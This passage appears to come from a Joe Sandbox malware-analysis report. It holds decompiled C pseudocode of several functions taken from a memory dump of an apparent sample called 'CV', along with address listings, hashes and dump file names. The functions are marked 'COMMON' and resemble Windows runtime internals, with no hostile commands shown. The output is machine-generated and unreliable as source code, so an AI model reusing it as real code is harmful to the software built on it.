								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E012800C2(0x1338608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x012720a0
0x012720a8
0x012720ad
0x012720b3
0x012720b8
0x012720c2
0x012720c7
0x012720cb
0x012720d2
0x01272263
0x01272266
0x012b5836
0x012b5836
0x00000000
0x0127226c
0x0127226c
0x01272270
0x01272274
0x012720e2
0x012720e2
0x012720e6
0x012720ee
0x012b57dc
0x012b57de
0x012b57ec
0x012b57ec
0x012b57f1
0x012b57f3
0x012b57f8
0x00000000
0x012b57f8
0x012b57e0
0x012b57e4
0x012b57ea
0x00000000
0x00000000
0x00000000
0x012b57ea
0x012720f4
0x012720f4
0x012720f8
0x012720f8
0x012720fc
0x01272100
0x01272106
0x01272201
0x01272206
0x0127220b
0x0127220e
0x012722a9
0x012722ac
0x00000000
0x00000000
0x012722b2
0x012722b5
0x012b5801
0x012b5806
0x00000000
0x00000000
0x012b5810
0x012b5815
0x012b5818
0x00000000
0x00000000
0x012b581e
0x012722bb
0x012722bb
0x01272218
0x01272218
0x0127221c
0x01272220
0x01272222
0x012722c2
0x012722c4
0x012722dc
0x012722dc
0x012722e1
0x00000000
0x00000000
0x00000000
0x012722e7
0x012722c8
0x012722cd
0x012722d3
0x012722d6
0x012b5823
0x012b5825
0x012b5827
0x00000000
0x00000000
0x012b582d
0x00000000
0x012b582d
0x00000000
0x01272228
0x01272228
0x00000000
0x01272228
0x01272222
0x01272214
0x01272214
0x00000000
0x01272114
0x01272114
0x01272114
0x0127211a
0x0127211c
0x01272348
0x0127234d
0x012b5840
0x012b5845
0x012b5848
0x012b584e
0x012b584e
0x012b5848
0x01272353
0x01272355
0x01272388
0x01272388
0x01272368
0x0127236a
0x0127236c
0x0127238f
0x00000000
0x0127236e
0x0127236e
0x0127218e
0x0127218e
0x01272191
0x01272195
0x012b5a03
0x012b5a06
0x012b5a0c
0x012b5a0f
0x012b5a11
0x012b5a13
0x012b5a13
0x012b5a19
0x012b5a1f
0x00000000
0x0127219b
0x0127219b
0x012721a0
0x01272282
0x01272284
0x01272284
0x01272284
0x01272284
0x012721a6
0x012721a9
0x012721ac
0x012721ae
0x012721b3
0x0127228b
0x01272290
0x01272379
0x01272296
0x01272298
0x01272298
0x01272290
0x012721b9
0x012721be
0x012722a2
0x012722a2
0x012721c4
0x012721c8
0x012721cc
0x012721d0
0x012721d4
0x012721de
0x012721e3
0x012b5a29
0x012b5a2c
0x00000000
0x00000000
0x012b5a3b
0x00000000
0x012721e9
0x012721e9
0x012721e9
0x012721ee
0x012721f1
0x012b5a45
0x012b5a4b
0x012b5a52
0x012b5a58
0x012b5a5d
0x012b5a5f
0x012b5a71
0x012b5a61
0x012b5a6a
0x012b5a6a
0x012b5a76
0x012b5a79
0x012b5a7f
0x012b5a83
0x012b5a85
0x012b5a87
0x012b5a87
0x012b5a8c
0x012b5a91
0x012b5a97
0x012b5a9f
0x012b5aa0
0x012b5aa1
0x012b5aa6
0x012b5aab
0x012b5ab1
0x012b5ab3
0x012b5ab9
0x012b5aca
0x012b5ad4
0x012b5ad4
0x012b5ade
0x012b5ade
0x012b5aab
0x012b5a79
0x012b5a52
0x012721f7
0x012721f9
0x012721fe
0x012721fe
0x012721e3
0x01272195
0x0127236c
0x01272122
0x01272122
0x01272124
0x01272231
0x01272236
0x01272236
0x01272238
0x01272238
0x01272240
0x01272242
0x01272244
0x012b59fc
0x0127218c
0x0127218c
0x00000000
0x0127218c
0x0127224a
0x0127224f
0x01272256
0x01272304
0x01272309
0x0127230f
0x0127231e
0x0127231e
0x0127231e
0x01272320
0x01272325
0x0127232a
0x0127232c
0x0127233e
0x0127233e
0x00000000
0x0127232c
0x01272311
0x01272317
0x0127231a
0x0127231c
0x01272380
0x01272380
0x01272380
0x01272384
0x00000000
0x00000000
0x01272386
0x00000000
0x0127231c
0x0127225c
0x0127225c
0x00000000
0x0127225c
0x0127212a
0x01272134
0x01272138
0x0127213d
0x012b5858
0x012b5863
0x012b5863
0x012b5867
0x012b586a
0x00000000
0x00000000
0x012b586c
0x012b586c
0x012b5871
0x012b5875
0x012b5877
0x012b5997
0x012b599c
0x012b59a1
0x012b59a7
0x012b59a7
0x00000000
0x012b59a7
0x012b587d
0x00000000
0x012b588b
0x012b588b
0x012b5890
0x012b5892
0x012b5894
0x012b5899
0x012b589b
0x012b58a0
0x012b58a0
0x012b58aa
0x012b58b2
0x012b58b6
0x012b58be
0x012b58c6
0x012b58c9
0x012b590d
0x012b5917
0x012b591a
0x012b591c
0x012b5920
0x012b5928
0x012b592a
0x012b592c
0x012b592e
0x012b592e
0x012b58cb
0x012b58cd
0x012b58d8
0x012b58e0
0x012b58f4
0x012b58fe
0x012b58fe
0x012b593a
0x012b593e
0x012b5940
0x012b5942
0x00000000
0x012b5944
0x012b5944
0x012b5949
0x012b594e
0x012b594e
0x012b5953
0x012b595b
0x012b5976
0x012b5976
0x012b597a
0x012b597f
0x00000000
0x00000000
0x00000000
0x00000000
0x012b5981
0x012b5981
0x012b5981
0x012b5983
0x012b5988
0x012b598d
0x012b5991
0x012b5991
0x00000000
0x012b595d
0x012b595d
0x012b5963
0x012b5965
0x00000000
0x00000000
0x00000000
0x00000000
0x012b5967
0x012b5967
0x012b596b
0x012b596d
0x00000000
0x00000000
0x012b596f
0x012b5971
0x012b5971
0x012b5974
0x00000000
0x00000000
0x00000000
0x012b5974
0x00000000
0x012b5967
0x012b595b
0x012b5942
0x012b5863
0x01272143
0x01272143
0x01272149
0x0127214f
0x012722f1
0x012722f6
0x00000000
0x01272173
0x01272173
0x0127217d
0x01272181
0x01272186
0x012b59ae
0x012b59b2
0x012b59b5
0x012b59b7
0x012b59ba
0x012b59cd
0x012b59d1
0x012b59d5
0x012b59d9
0x012b59db
0x00000000
0x00000000
0x012b59dd
0x012b59dd
0x012b59e1
0x012b59e4
0x012b59e7
0x012b59ee
0x012b59ee
0x012b59f3
0x012b59f3
0x00000000
0x01272186
0x0127214f
0x01272106
0x01272266
0x012720d8
0x012720da
0x012720e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18dffeb1c7cc2483ffb43c31a50460c543b2c2d59a22e8ed47fdb7b4e2075c8
Instruction ID: 9349a889ce2cc2482b05622dcfd5784954a7d206550dd1e11b1d018f1795fa46
Opcode Fuzzy Hash: d18dffeb1c7cc2483ffb43c31a50460c543b2c2d59a22e8ed47fdb7b4e2075c8
Instruction Fuzzy Hash: 40F12270A28342DFE726CF2CC88176B7BE5BF85364F08851DEA959B281D774D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0125849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0125849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x131f9c0);
				E0129D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1337b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0125CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01262280( *[fs:0x30], 0x1338550);
						_t139 =  *0x1337b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0127F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0125FFB0(_t193, _t235, 0x1338550);
								L5:
								return E0129D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01241C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1337b9c; // 0x0
							_t235 = L01264620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1337b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0127A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0125FFB0(_t193, _t235, 0x1338550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L012677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L012677F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1337b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1337b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E012837C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1337b9c; // 0x0
									_t214 = L01264620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E012837F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1337b10 =  *0x1337b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1337b04 =  *0x1337b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L012677F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L012677F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1337b08 =  *0x1337b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E012857C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0128F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L012677F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0127A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L012677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E012896C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0125849b
0x0125849b
0x0125849b
0x0125849b
0x0125849d
0x012584a2
0x012584a7
0x012584b1
0x012584d8
0x00000000
0x012584b3
0x012584c4
0x012584c9
0x012584cd
0x012584cf
0x012584cf
0x012584d6
0x012584e6
0x012584e9
0x012584ec
0x012584ef
0x012584f2
0x012584f4
0x012584fc
0x01258501
0x01258506
0x01258509
0x012586e0
0x012586e5
0x012586e8
0x012586ed
0x012586f0
0x012586f2
0x012a9afd
0x012a9b02
0x012584da
0x012584df
0x012584df
0x012586fa
0x012586fd
0x012586fe
0x01258701
0x01258706
0x01258709
0x0125870b
0x00000000
0x00000000
0x01258711
0x01258725
0x01258727
0x0125872a
0x0125872c
0x012a9af0
0x012a9af5
0x01258732
0x01258732
0x01258732
0x01258735
0x01258737
0x01258515
0x01258515
0x01258518
0x0125851d
0x01258523
0x01258527
0x0125852b
0x01258537
0x01258539
0x0125853c
0x0125853e
0x0125868c
0x01258691
0x01258699
0x0125869b
0x01258744
0x01258748
0x012586a1
0x012586a1
0x012586a1
0x012586a4
0x012586a8
0x012a9bdf
0x012a9bdf
0x012586ae
0x012586b0
0x00000000
0x012586b6
0x00000000
0x012a9be9
0x012586b0
0x01258544
0x0125854a
0x0125854d
0x01258551
0x0125876e
0x01258778
0x0125877b
0x01258780
0x01258557
0x01258557
0x0125855d
0x0125855d
0x0125856b
0x0125856e
0x01258570
0x01258573
0x01258576
0x01258576
0x01258579
0x0125857b
0x00000000
0x00000000
0x01258581
0x012585a0
0x012585a2
0x012585a5
0x012585a7
0x012a9b1b
0x012a9b1b
0x0125862e
0x0125862e
0x01258631
0x01258631
0x01258634
0x01258636
0x01258669
0x01258669
0x0125866b
0x012a9bbf
0x012a9bc4
0x012a9bc8
0x012a9bce
0x012a9bce
0x01258671
0x01258671
0x01258674
0x01258676
0x012a9bae
0x012a9bae
0x01258676
0x0125867c
0x0125867e
0x01258688
0x01258688
0x00000000
0x0125867e
0x01258638
0x01258638
0x0125863b
0x0125863e
0x0125863f
0x01258642
0x01258645
0x01258648
0x0125864d
0x012a9b69
0x012a9b6e
0x012a9b7b
0x012a9b81
0x012a9b85
0x012a9b89
0x012a9ba7
0x012a9b8b
0x012a9b91
0x012a9b9a
0x012a9b9f
0x012a9b9f
0x01258788
0x0125878d
0x01258763
0x01258763
0x01258766
0x00000000
0x01258766
0x012a9b70
0x00000000
0x012a9b70
0x01258656
0x0125865a
0x0125865c
0x01258752
0x01258756
0x00000000
0x00000000
0x0125875e
0x00000000
0x0125875e
0x01258662
0x01258662
0x01258662
0x01258666
0x00000000
0x01258666
0x012585b7
0x012585b9
0x012585bc
0x012585bf
0x012585cc
0x012585d1
0x012585d4
0x012585db
0x012585de
0x012585e0
0x012a9b5f
0x00000000
0x012a9b5f
0x012585e6
0x012585ea
0x012586c3
0x012586c5
0x012586c8
0x012586ca
0x012a9b16
0x00000000
0x012a9b16
0x012586d6
0x012585f6
0x012585f6
0x012585f9
0x01258602
0x01258606
0x0125860a
0x0125860b
0x0125860e
0x01258611
0x00000000
0x01258611
0x012585f3
0x00000000
0x012585f3
0x01258619
0x0125861e
0x0125861e
0x01258621
0x01258622
0x01258623
0x01258625
0x0125862c
0x00000000
0x0125873d
0x00000000
0x0125873d
0x01258737
0x0125850f
0x01258512
0x00000000
0x01258512
0x00000000
0x012584d6

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4b9f434fa313afd141a2a22664294ef56e89bb35809e15ea7c1b16479e764c
Instruction ID: 47a8d3dcaf7e0e65aa01d379dcbe71c2ea9f71a8590730cb901044ee27fae876
Opcode Fuzzy Hash: 6f4b9f434fa313afd141a2a22664294ef56e89bb35809e15ea7c1b16479e764c
Instruction Fuzzy Hash: 1DB15DB4E2020ADFDF19DF9AC9C4AADBBB9FF44304F10412AE905AB345D7B4A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0124C600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0124C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x133d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01256D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0128B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1337b9c; // 0x0
					_t74 = L01264620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01289650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L012677F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0128F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E012813C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L012677F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01289650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0124c608
0x0124c615
0x0124c625
0x0124c62d
0x0124c635
0x0124c640
0x0124c680
0x0124c687
0x0124c688
0x0124c689
0x0124c694
0x0124c694
0x0124c642
0x0124c64a
0x0124c697
0x012b7a25
0x012b7a2b
0x012b7a2e
0x012b7a30
0x012b7bea
0x012b7bea
0x00000000
0x012b7bea
0x012b7a36
0x012b7a43
0x012b7a48
0x012b7a4c
0x012b7a4e
0x00000000
0x00000000
0x012b7a58
0x012b7a5a
0x012b7a5b
0x012b7a5c
0x012b7a5d
0x012b7a63
0x012b7a64
0x012b7a6a
0x012b7a6c
0x012b7a6e
0x012b79cb
0x012b79cb
0x012b79ce
0x012b79d0
0x012b7a98
0x012b7a9b
0x012b7a9b
0x012b7a9e
0x012b7aa1
0x012b7bbe
0x012b7bbe
0x012b7bc0
0x012b7be0
0x012b7be0
0x012b7a01
0x012b7a01
0x012b7a05
0x012b7a07
0x012b7a15
0x012b7a15
0x012b7a1a
0x00000000
0x012b7a1a
0x012b7bc2
0x012b7bc6
0x012b7bc9
0x012b7bcd
0x012b7bcf
0x012b79e6
0x012b79e6
0x012b79eb
0x012b79eb
0x012b79ef
0x012b79f1
0x00000000
0x00000000
0x012b79f3
0x012b79f5
0x012b79ff
0x012b79ff
0x00000000
0x012b79ff
0x012b79f7
0x012b79fd
0x00000000
0x00000000
0x00000000
0x012b79fd
0x012b7bd5
0x012b7bd8
0x00000000
0x00000000
0x012b7ba9
0x012b7bac
0x012b7bb0
0x012b7bb1
0x012b7bb1
0x012b7bb6
0x00000000
0x012b7bb6
0x012b7aa7
0x012b7aaa
0x00000000
0x00000000
0x012b7ab2
0x012b7ab3
0x012b7ab5
0x012b7aec
0x012b7aef
0x012b7b25
0x012b7b28
0x012b7b62
0x012b7b64
0x012b7b8f
0x012b7b92
0x012b7b96
0x012b7b98
0x00000000
0x00000000
0x012b7b9e
0x012b7b9f
0x012b7ba3
0x00000000
0x012b7ba3
0x012b7b66
